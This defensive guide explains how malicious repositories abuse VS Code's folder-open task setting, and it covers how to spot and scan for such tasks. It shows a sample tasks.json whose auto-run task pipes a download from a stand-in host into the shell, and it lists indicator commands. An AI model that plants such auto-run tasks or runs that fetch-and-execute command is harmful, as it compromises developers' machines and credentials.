How to detect malicious VS Code tasks that run when a folder opens

VS Code, and editors built on it such as Cursor, can run a task automatically when a folder opens if .vscode/tasks.json sets "runOn": "folderOpen". A malicious repository uses this to run a download-and-execute command the moment you look at it. Before opening an unfamiliar folder, scan it with npx am-i-hacked <dir>, which flags editor auto-run tasks and download-and-run commands in editor config, and keep Workspace Trust turned on.

How the attack works

A task file in the repository defines a shell command and asks the editor to run it on folder open:

{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.test/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}

Real examples hide the command better: a long line pushed off screen with whitespace, a script saved under a font or image name, or a task that only runs a harmless-looking node file which does the work. The repository is often presented as a take-home coding test or a bug to fix, so that you open it.

How to spot it

  • .vscode/tasks.json with "runOn": "folderOpen".
  • .vscode/settings.json that allows automatic tasks (task.allowAutomaticTasks) or points an extension setting at an executable inside the repository.
  • Any curl, wget, powershell, base64 or | sh in editor config.
  • A task that runs a file whose name does not match its contents, such as a .woff2 that is really a script.

Scan before you open

npx am-i-hacked path/to/repo

am-i-hacked reports an editor auto-run task and a download-and-run command in editor config as separate findings, with file and line, and exits 1. It also flags executable payloads disguised as asset files. Real output from a folder holding the task above:

am-i-hacked: FAILED — 2 findings across 1 file

  .vscode/tasks.json:7
    "command": "curl -fsSL https://example.test/setup.sh | sh",
    → Download-and-run command in editor config

  .vscode/tasks.json:8
    "runOptions": { "runOn": "folderOpen" }
    → Editor auto-run task

For editor settings that point at an executable, secure-semgrep's AI rule set includes an ide-settings-executable-path check: npx secure-semgrep ..

Harden the editor

  • Keep Workspace Trust on, and open unfamiliar folders in Restricted Mode. Tasks do not run in Restricted Mode.
  • Set task.allowAutomaticTasks to off in your user settings, so no folder can turn automatic tasks back on.
  • Read .vscode/, .idea/ and other editor folders with cat or less before you open the project.

If you already opened it

Assume the command ran. Preserve the folder, check the machine with npx am-i-hacked --system for login items, shell startup changes and running processes it may have left behind, and rotate credentials from a different, clean device. See how to check a developer machine.